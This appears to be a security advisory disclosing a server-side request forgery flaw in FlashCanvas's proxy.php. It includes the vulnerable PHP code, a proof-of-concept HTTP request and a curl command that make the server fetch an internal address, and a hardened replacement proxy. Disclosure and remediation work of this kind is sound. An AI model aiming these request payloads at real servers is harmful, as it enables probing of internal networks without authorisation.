Description
Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.
Affected version: latest
Tested with PHP 7.2
The vulnerable code is in lib/FlashCanvas/bin/proxy.php. The value of the url query parameter (`$_GET['url']`) is only passed through a str_replace() that does not constrain the destination, and is then handed straight to a request sink: curl_init()/curl_exec() when the curl extension is loaded, or readfile() when it is not (the readfile() branch is the one examined here). In either branch the server fetches whatever URL the client supplied, so an attacker controls the destination of a server-side request, which is an SSRF vulnerability.
```php
// ......
// $search/$replace are defined earlier in proxy.php (not shown); they do not restrict the target
$url = str_replace($search, $replace, $_GET['url']);
// Disable compression
header('Content-Encoding: none');
// Load and output the file
if (extension_loaded('curl')) {
    // Use cURL extension: fetches the attacker-controlled $url and echoes the body
    $ch = curl_init($url);
    curl_exec($ch);
    curl_close($ch);
} else {
    // Use the http:// wrapper: readfile() opens the attacker-controlled $url and echoes it
    readfile($url);
}
// ......
```

Because the url parameter is unrestricted, the server can be made to send requests on the attacker's behalf, for example to probe web services on the internal network that are not reachable from outside. The corresponding PoC is as follows (the PoC uses 172.16.119.1 as both the vulnerable host and the probe target):
```http
GET /proxy.php?url=http://172.16.119.1/proxypoc HTTP/1.1
Host: 172.16.119.1
Referer: #/flash123canvas.swf
Connection: close
```
You can also use the following curl command to verify the vulnerability; a request for /readfilepoc arriving at 172.16.119.1 (visible in that host's web server log) confirms that the request was issued by the server rather than by the client:

```shell
curl -i -s -k -X $'GET' \
  -H $'Host: 172.16.119.1:81' -H $'Referer: #/flash123canvas.swf' -H $'Connection: close' \
  $'http://172.16.119.1:81/proxy.php?url=http://172.16.119.1/readfilepoc'
```
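For comparison, the following is a hardened replacement for the proxy logic above. It is an added example, not code from the FlashCanvas project or from this report, and the function names (`is_public_ip`, `validate_proxy_url`, `fetch_remote`) are hypothetical. It assumes the proxy only ever needs to fetch http(s) resources from public hosts; it validates the scheme, resolves the host once and rejects private/loopback/link-local/reserved addresses, pins the checked IP with CURLOPT_RESOLVE so a DNS rebind between check and use cannot swap in an internal address, forbids redirects, and drops the readfile() fallback entirely (readfile() accepts any PHP stream wrapper, not only http://, which is one more reason not to hand it a client-supplied string).

```php
<?php
// Added example (not FlashCanvas project code): hardened proxy.php logic.
// Assumes only http(s) fetches of public hosts are legitimate; function
// names are hypothetical.

// True only for a public IPv4/IPv6 literal: rejects loopback, RFC 1918,
// link-local (including cloud metadata 169.254.169.254) and reserved ranges.
function is_public_ip(string $ip): bool {
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

// Validate the user-supplied URL and resolve its host once.
// Returns [url, host, port, ip]; throws on anything suspicious.
function validate_proxy_url(string $url): array {
    $p = parse_url($url);
    if ($p === false || empty($p['scheme']) || empty($p['host'])) {
        throw new InvalidArgumentException('malformed URL');
    }
    $scheme = strtolower($p['scheme']);
    // Only http/https: readfile()/cURL would otherwise accept file://,
    // php://, gopher:// and other wrappers or protocols.
    if ($scheme !== 'http' && $scheme !== 'https') {
        throw new InvalidArgumentException('scheme not allowed');
    }
    if (isset($p['user']) || isset($p['pass'])) {
        throw new InvalidArgumentException('credentials in URL not allowed');
    }
    $host = strtolower($p['host']);
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    // gethostbynamel() normalises IPv4 literals (including decimal/octal
    // forms) and returns every A record, so each address is checked.
    // Assumption of this example: IPv6 targets are not needed, so bracketed
    // IPv6 literals and AAAA-only hosts are rejected here.
    $ips = gethostbynamel($host);
    if ($ips === false || count($ips) === 0) {
        throw new InvalidArgumentException('host does not resolve');
    }
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) {
            throw new InvalidArgumentException("host resolves to non-public address {$ip}");
        }
    }
    return [$url, $host, (int) $port, $ips[0]];
}

// Fetch with cURL, pinning the already-checked IP (defeats DNS rebinding
// between validation and connect) and refusing redirects, which could
// otherwise bounce the request to an internal target.
function fetch_remote(string $url): string {
    [$url, $host, $port, $ip] = validate_proxy_url($url);
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$host}:{$port}:{$ip}"],
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 15,
        CURLOPT_MAXFILESIZE    => 10 * 1024 * 1024,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("fetch failed: {$err}");
    }
    return $body;
}

// Entry point mirroring proxy.php, without the readfile() fallback: if cURL
// is missing the proxy refuses instead of falling back to stream wrappers.
if (!extension_loaded('curl')) {
    http_response_code(503);
    exit('proxy unavailable');
}
try {
    $body = fetch_remote($_GET['url'] ?? '');
    header('Content-Encoding: none');
    echo $body;
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    exit('rejected: ' . $e->getMessage());
} catch (RuntimeException $e) {
    http_response_code(502);
    exit('upstream error');
}
```

With this in place the PoC above (`url=http://172.16.119.1/readfilepoc`) is rejected with HTTP 400 because 172.16.119.1 is an RFC 1918 address, and no server-side request is made. Where the set of legitimate origins is known in advance, an explicit host allowlist checked before any resolution is simpler and stronger than the address-range denylist shown here; the example uses the denylist only because the report does not say which hosts the proxy is meant to serve.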
